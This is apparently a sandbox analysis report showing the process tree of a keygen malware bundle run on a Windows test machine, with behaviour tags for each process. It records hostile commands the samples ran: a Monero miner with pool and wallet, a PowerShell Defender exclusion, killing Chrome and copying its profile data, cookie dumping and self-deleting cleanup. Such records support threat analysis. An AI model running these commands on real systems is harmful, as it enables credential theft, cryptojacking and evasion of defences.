PID 3756 wrote to memory of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
PID 3756 wrote to memory of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
PID 3192 wrote to memory of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3192 wrote to memory of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3192 wrote to memory of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3756 wrote to memory of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
PID 3756 wrote to memory of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
PID 3756 wrote to memory of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
PID 3756 wrote to memory of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
PID 3756 wrote to memory of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
PID 3756 wrote to memory of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
PID 3756 wrote to memory of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
PID 3756 wrote to memory of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
PID 3756 wrote to memory of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
PID 3756 wrote to memory of 4196	3756	BB57.tmp.exe	BB57.tmp.exe
PID 3192 wrote to memory of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3192 wrote to memory of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3192 wrote to memory of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3192 wrote to memory of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3192 wrote to memory of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3192 wrote to memory of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3192 wrote to memory of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3192 wrote to memory of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3192 wrote to memory of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3192 wrote to memory of 3876	3192	BB57.tmp.exe	BB57.tmp.exe
PID 3376 wrote to memory of 4124	3376	BB57.tmp.exe	BB57.tmp.exe
PID 3376 wrote to memory of 4124	3376	BB57.tmp.exe	BB57.tmp.exe
PID 3376 wrote to memory of 4124	3376	BB57.tmp.exe	BB57.tmp.exe
PID 3376 wrote to memory of 4124	3376	BB57.tmp.exe	BB57.tmp.exe
PID 3376 wrote to memory of 4124	3376	BB57.tmp.exe	BB57.tmp.exe
PID 3376 wrote to memory of 4124	3376	BB57.tmp.exe	BB57.tmp.exe
PID 3376 wrote to memory of 4124	3376	BB57.tmp.exe	BB57.tmp.exe
PID 3376 wrote to memory of 4124	3376	BB57.tmp.exe	BB57.tmp.exe
PID 3376 wrote to memory of 4124	3376	BB57.tmp.exe	BB57.tmp.exe
PID 3376 wrote to memory of 4124	3376	BB57.tmp.exe	BB57.tmp.exe
PID 3376 wrote to memory of 4124	3376	BB57.tmp.exe	BB57.tmp.exe
PID 3376 wrote to memory of 4124	3376	BB57.tmp.exe	BB57.tmp.exe
PID 3376 wrote to memory of 4124	3376	BB57.tmp.exe	BB57.tmp.exe
PID 392 wrote to memory of 3216	392	BTRSetp.exe	7654484.84
PID 392 wrote to memory of 3216	392	BTRSetp.exe	7654484.84
PID 392 wrote to memory of 3216	392	BTRSetp.exe	7654484.84

C:\Users\Admin\AppData\Local\Temp\Downloads.exe
"C:\Users\Admin\AppData\Local\Temp\Downloads.exe"
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:504

C:\Users\Admin\Desktop\file.exe
"C:\Users\Admin\Desktop\file.exe"
1⤵
- Executes dropped EXE
PID:2288

C:\Users\Admin\AppData\Roaming\A082.tmp.exe
"C:\Users\Admin\AppData\Roaming\A082.tmp.exe"
2⤵
PID:3532

C:\Users\Admin\AppData\Roaming\A082.tmp.exe
"C:\Users\Admin\AppData\Roaming\A082.tmp.exe"
3⤵
PID:5932

C:\Users\Admin\Desktop\file.exe
"C:\Users\Admin\Desktop\file.exe"
1⤵
- Executes dropped EXE
PID:2244

C:\Users\Admin\AppData\Roaming\9C6B.tmp.exe
"C:\Users\Admin\AppData\Roaming\9C6B.tmp.exe"
2⤵
PID:6048

C:\Users\Admin\AppData\Roaming\9C6B.tmp.exe
"C:\Users\Admin\AppData\Roaming\9C6B.tmp.exe"
3⤵
PID:5756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Desktop\file.exe"
2⤵
PID:1500

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
3⤵
- Runs ping.exe
PID:3156

C:\Users\Admin\Desktop\file.exe
"C:\Users\Admin\Desktop\file.exe"
1⤵
- Executes dropped EXE
PID:384

C:\Users\Admin\AppData\Roaming\AB11.tmp.exe
"C:\Users\Admin\AppData\Roaming\AB11.tmp.exe"
2⤵
PID:6960

C:\Users\Admin\AppData\Roaming\AB11.tmp.exe
"C:\Users\Admin\AppData\Roaming\AB11.tmp.exe"
3⤵
PID:3480

C:\Users\Admin\Desktop\BTRSetp.exe
"C:\Users\Admin\Desktop\BTRSetp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3168

C:\ProgramData\7949177.87
"C:\ProgramData\7949177.87"
2⤵
- Executes dropped EXE
PID:3092

C:\ProgramData\396240.4
"C:\ProgramData\396240.4"
2⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:2784

C:\ProgramData\680866.7
"C:\ProgramData\680866.7"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4056

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:3716

C:\ProgramData\8234507.90
"C:\ProgramData\8234507.90"
2⤵
- Executes dropped EXE
PID:5132

C:\Users\Admin\Desktop\BTRSetp.exe
"C:\Users\Admin\Desktop\BTRSetp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:732

C:\ProgramData\8537361.93
"C:\ProgramData\8537361.93"
2⤵
- Executes dropped EXE
PID:4980

C:\ProgramData\1327749.14
"C:\ProgramData\1327749.14"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3268

C:\ProgramData\6095024.67
"C:\ProgramData\6095024.67"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2152

C:\ProgramData\3024737.33
"C:\ProgramData\3024737.33"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4524

C:\Users\Admin\Desktop\BTRSetp.exe
"C:\Users\Admin\Desktop\BTRSetp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2840

C:\ProgramData\4221941.46
"C:\ProgramData\4221941.46"
2⤵
- Executes dropped EXE
PID:3848

C:\ProgramData\7419691.81
"C:\ProgramData\7419691.81"
2⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:3728

C:\ProgramData\2878343.31
"C:\ProgramData\2878343.31"
2⤵
- Executes dropped EXE
PID:5288

C:\ProgramData\4192944.46
"C:\ProgramData\4192944.46"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5200

C:\Users\Admin\Desktop\BTRSetp.exe
"C:\Users\Admin\Desktop\BTRSetp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:392

C:\ProgramData\7654484.84
"C:\ProgramData\7654484.84"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3216

C:\ProgramData\101547.1
"C:\ProgramData\101547.1"
2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3572

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
3⤵
- Executes dropped EXE
PID:5760

C:\ProgramData\6153723.67
"C:\ProgramData\6153723.67"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3308

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
3⤵
PID:6196

C:\ProgramData\4555200.50
"C:\ProgramData\4555200.50"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3264

C:\Users\Admin\Desktop\BB57.tmp.exe
"C:\Users\Admin\Desktop\BB57.tmp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1244

C:\Users\Admin\Desktop\BB57.tmp.exe
"C:\Users\Admin\Desktop\BB57.tmp.exe"
2⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5088

C:\Users\Admin\Desktop\BB57.tmp.exe
"C:\Users\Admin\Desktop\BB57.tmp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3756

C:\Users\Admin\Desktop\BB57.tmp.exe
"C:\Users\Admin\Desktop\BB57.tmp.exe"
2⤵
- Executes dropped EXE
PID:4196

C:\Users\Admin\Desktop\BB57.tmp.exe
"C:\Users\Admin\Desktop\BB57.tmp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3192

C:\Users\Admin\Desktop\BB57.tmp.exe
"C:\Users\Admin\Desktop\BB57.tmp.exe"
2⤵
- Executes dropped EXE
PID:3876

C:\Users\Admin\Desktop\Setup.exe
"C:\Users\Admin\Desktop\Setup.exe"
1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
PID:2136

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4028

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
2⤵
PID:5140

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
PID:6768

C:\Users\Admin\AppData\Roaming\1615043066859.exe
"C:\Users\Admin\AppData\Roaming\1615043066859.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615043066859.txt"
3⤵
PID:6864

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
PID:6064

C:\Users\Admin\AppData\Roaming\1615043077580.exe
"C:\Users\Admin\AppData\Roaming\1615043077580.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615043077580.txt"
3⤵
PID:6492

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
PID:6956

C:\Users\Admin\AppData\Roaming\1615043092408.exe
"C:\Users\Admin\AppData\Roaming\1615043092408.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615043092408.txt"
3⤵
PID:7140

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
3⤵
PID:396

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
3⤵
PID:7392

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
2⤵
PID:4584

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:6728

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:6964

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
3⤵
PID:7068

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Runs ping.exe
PID:4108

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\Desktop\Setup.exe"
2⤵
PID:5568

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
3⤵
- Runs ping.exe
PID:3152

C:\Users\Admin\Desktop\Setup.exe
"C:\Users\Admin\Desktop\Setup.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3900

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\Desktop\Setup.exe"
2⤵
PID:3444

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
3⤵
- Runs ping.exe
PID:3828

C:\Users\Admin\Desktop\md2_2efs.exe
"C:\Users\Admin\Desktop\md2_2efs.exe"
1⤵
- Executes dropped EXE
PID:1600

C:\Users\Admin\Desktop\BB57.tmp.exe
"C:\Users\Admin\Desktop\BB57.tmp.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3376

C:\Users\Admin\Desktop\BB57.tmp.exe
"C:\Users\Admin\Desktop\BB57.tmp.exe"
2⤵
- Executes dropped EXE
PID:4124

C:\Users\Admin\Desktop\md2_2efs.exe
"C:\Users\Admin\Desktop\md2_2efs.exe"
1⤵
- Executes dropped EXE
PID:2232

C:\Users\Admin\Desktop\askinstall20.exe
"C:\Users\Admin\Desktop\askinstall20.exe"
1⤵
- Executes dropped EXE
PID:2924

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:2572

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
PID:5580

C:\Users\Admin\Desktop\askinstall20.exe
"C:\Users\Admin\Desktop\askinstall20.exe"
1⤵
- Executes dropped EXE
PID:4100

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:7132

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
PID:4644

C:\Users\Admin\Desktop\keygen-step-4.exe
"C:\Users\Admin\Desktop\keygen-step-4.exe"
1⤵
- Executes dropped EXE
PID:4264

C:\Users\Admin\Desktop\keygen-step-4.exe
"C:\Users\Admin\Desktop\keygen-step-4.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4316

C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
2⤵
- Executes dropped EXE
PID:4968

C:\Users\Admin\AppData\Roaming\B1D7.tmp.exe
"C:\Users\Admin\AppData\Roaming\B1D7.tmp.exe"
3⤵
PID:6580

C:\Users\Admin\AppData\Roaming\B1D7.tmp.exe
"C:\Users\Admin\AppData\Roaming\B1D7.tmp.exe"
4⤵
PID:4500

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
2⤵
PID:4172

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
3⤵
PID:6956

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Runs ping.exe
PID:7380

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
2⤵
PID:5128

C:\Users\Admin\AppData\Local\Temp\3EUZX5JV2H\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\3EUZX5JV2H\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
3⤵
PID:7856

C:\Users\Admin\AppData\Local\Temp\3EUZX5JV2H\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\3EUZX5JV2H\multitimer.exe" 1 3.1615039347.60438b733a60c 101
4⤵
PID:7416

C:\Users\Admin\AppData\Local\Temp\3EUZX5JV2H\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\3EUZX5JV2H\multitimer.exe" 2 3.1615039347.60438b733a60c
5⤵
PID:4560

C:\Users\Admin\AppData\Local\Temp\kybdk2m4ss4\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\kybdk2m4ss4\Setup3310.exe" /Verysilent /subid=577
6⤵
PID:8096

C:\Users\Admin\AppData\Local\Temp\is-FHPRK.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FHPRK.tmp\Setup3310.tmp" /SL5="$30528,802346,56832,C:\Users\Admin\AppData\Local\Temp\kybdk2m4ss4\Setup3310.exe" /Verysilent /subid=577
7⤵
PID:7400

C:\Users\Admin\AppData\Local\Temp\is-1RGOF.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-1RGOF.tmp\Setup.exe" /Verysilent
8⤵
PID:8536

C:\Users\Admin\AppData\Local\Temp\is-RT7BI.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RT7BI.tmp\Setup.tmp" /SL5="$308D6,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-1RGOF.tmp\Setup.exe" /Verysilent
9⤵
PID:6744

C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\ProPlugin.exe" /Verysilent
10⤵
PID:9596

C:\Users\Admin\AppData\Local\Temp\is-GK55L.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GK55L.tmp\ProPlugin.tmp" /SL5="$40218,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\ProPlugin.exe" /Verysilent
11⤵
PID:1728

C:\Users\Admin\AppData\Local\Temp\is-5RHJC.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-5RHJC.tmp\Setup.exe"
12⤵
PID:7468

C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"
13⤵
PID:8080

C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\PictureLAb.exe" /Verysilent
10⤵
PID:8972

C:\Users\Admin\AppData\Local\Temp\is-MBQ1U.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MBQ1U.tmp\PictureLAb.tmp" /SL5="$4033E,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\PictureLAb.exe" /Verysilent
11⤵
PID:3368

C:\Users\Admin\AppData\Local\Temp\is-GR80O.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-GR80O.tmp\Setup.exe" /VERYSILENT
12⤵
PID:4892

C:\Users\Admin\AppData\Local\Temp\is-C6QOL.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C6QOL.tmp\Setup.tmp" /SL5="$303FA,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-GR80O.tmp\Setup.exe" /VERYSILENT
13⤵
PID:9236

C:\Users\Admin\AppData\Local\Temp\is-G65HT.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-G65HT.tmp\kkkk.exe" /S /UID=lab214
14⤵
PID:7060

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 756
15⤵
PID:7164

C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\Delta.exe" /Verysilent
10⤵
PID:2544

C:\Users\Admin\AppData\Local\Temp\is-KDE4O.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KDE4O.tmp\Delta.tmp" /SL5="$30780,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\Delta.exe" /Verysilent
11⤵
PID:9808

C:\Users\Admin\AppData\Local\Temp\is-O2NDP.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-O2NDP.tmp\Setup.exe" /VERYSILENT
12⤵
PID:4928

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-O2NDP.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
13⤵
PID:3664

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
14⤵
- Kills process with taskkill
PID:9600

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
14⤵
- Delays execution with timeout.exe
PID:10752

C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\zznote.exe" /Verysilent
10⤵
PID:888

C:\Users\Admin\AppData\Local\Temp\is-M0LV2.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M0LV2.tmp\zznote.tmp" /SL5="$40780,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\zznote.exe" /Verysilent
11⤵
PID:5224

C:\Users\Admin\AppData\Local\Temp\is-PVK0D.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-PVK0D.tmp\jg4_4jaa.exe" /silent
12⤵
PID:8588

C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-A9RVK.tmp\hjjgaa.exe" /Verysilent
10⤵
PID:9452

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
11⤵
PID:4184

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
11⤵
PID:5892

C:\Users\Admin\AppData\Local\Temp\5cw0orzcqec\vict.exe
"C:\Users\Admin\AppData\Local\Temp\5cw0orzcqec\vict.exe" /VERYSILENT /id=535
6⤵
PID:7928

C:\Users\Admin\AppData\Local\Temp\is-UBDDM.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UBDDM.tmp\vict.tmp" /SL5="$106FC,870426,780800,C:\Users\Admin\AppData\Local\Temp\5cw0orzcqec\vict.exe" /VERYSILENT /id=535
7⤵
PID:8396

C:\Users\Admin\AppData\Local\Temp\is-291O9.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-291O9.tmp\wimapi.exe" 535
8⤵
PID:8968

C:\Users\Admin\AppData\Local\Temp\lhz2eolbhqd\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\lhz2eolbhqd\safebits.exe" /S /pubid=1 /subid=451
6⤵
PID:7812

C:\Users\Admin\AppData\Local\Temp\qtzzrgcpv22\a503heaa4ry.exe
"C:\Users\Admin\AppData\Local\Temp\qtzzrgcpv22\a503heaa4ry.exe" /ustwo INSTALL
6⤵
PID:8196

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "a503heaa4ry.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\qtzzrgcpv22\a503heaa4ry.exe" & exit
7⤵
PID:6276

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "a503heaa4ry.exe" /f
8⤵
- Kills process with taskkill
PID:9012

C:\Users\Admin\AppData\Local\Temp\ymxxjpblk50\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\ymxxjpblk50\askinstall24.exe"
6⤵
PID:7480

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:8476

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:3624

C:\Users\Admin\AppData\Local\Temp\bennbnwemdm\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\bennbnwemdm\vpn.exe" /silent /subid=482
6⤵
PID:7660

C:\Users\Admin\AppData\Local\Temp\is-FJV0A.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FJV0A.tmp\vpn.tmp" /SL5="$10702,15170975,270336,C:\Users\Admin\AppData\Local\Temp\bennbnwemdm\vpn.exe" /silent /subid=482
7⤵
PID:8364

C:\Users\Admin\AppData\Local\Temp\2pdpah1wygh\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\2pdpah1wygh\chashepro3.exe" /VERYSILENT
6⤵
PID:6732

C:\Users\Admin\AppData\Local\Temp\etzhzzwyqr0\app.exe
"C:\Users\Admin\AppData\Local\Temp\etzhzzwyqr0\app.exe" /8-23
6⤵
PID:8372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Icy-Star"
7⤵
PID:8600

C:\Program Files (x86)\Icy-Star\7za.exe
"C:\Program Files (x86)\Icy-Star\7za.exe" e -p154.61.71.13 winamp-plugins.7z
7⤵
PID:6592

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Icy-Star\app.exe" -map "C:\Program Files (x86)\Icy-Star\WinmonProcessMonitor.sys""
7⤵
PID:7792

C:\Program Files (x86)\Icy-Star\app.exe
"C:\Program Files (x86)\Icy-Star\app.exe" -map "C:\Program Files (x86)\Icy-Star\WinmonProcessMonitor.sys"
8⤵
PID:6736

C:\Program Files (x86)\Icy-Star\7za.exe
"C:\Program Files (x86)\Icy-Star\7za.exe" e -p154.61.71.13 winamp.7z
7⤵
PID:1000

C:\Program Files (x86)\Icy-Star\app.exe
"C:\Program Files (x86)\Icy-Star\app.exe" /8-23
7⤵
PID:4004

C:\Users\Admin\AppData\Local\Temp\ajiy52lec2i\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\ajiy52lec2i\safebits.exe" /S /pubid=1 /subid=451
6⤵
PID:6664

C:\Users\Admin\AppData\Local\Temp\jbkg2obbyn3\vict.exe
"C:\Users\Admin\AppData\Local\Temp\jbkg2obbyn3\vict.exe" /VERYSILENT /id=535
6⤵
PID:64

C:\Users\Admin\AppData\Local\Temp\is-5IKOI.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5IKOI.tmp\vict.tmp" /SL5="$4056C,870426,780800,C:\Users\Admin\AppData\Local\Temp\jbkg2obbyn3\vict.exe" /VERYSILENT /id=535
7⤵
PID:2004

C:\Users\Admin\AppData\Local\Temp\is-GJUK0.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-GJUK0.tmp\wimapi.exe" 535
8⤵
PID:836

C:\Users\Admin\AppData\Local\Temp\sgooecakue5\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\sgooecakue5\askinstall24.exe"
6⤵
PID:10696

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:6872

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:8820

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
7⤵
PID:7200

C:\Users\Admin\AppData\Local\Temp\m4kqxujlrgv\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\m4kqxujlrgv\Setup3310.exe" /Verysilent /subid=577
6⤵
PID:8812

C:\Users\Admin\AppData\Local\Temp\is-DN5QA.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DN5QA.tmp\Setup3310.tmp" /SL5="$D02EE,802346,56832,C:\Users\Admin\AppData\Local\Temp\m4kqxujlrgv\Setup3310.exe" /Verysilent /subid=577
7⤵
PID:10340

C:\Users\Admin\AppData\Local\Temp\is-NCF50.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-NCF50.tmp\Setup.exe" /Verysilent
8⤵
PID:11020

C:\Users\Admin\AppData\Local\Temp\is-805QU.tmp\Setup.tmp
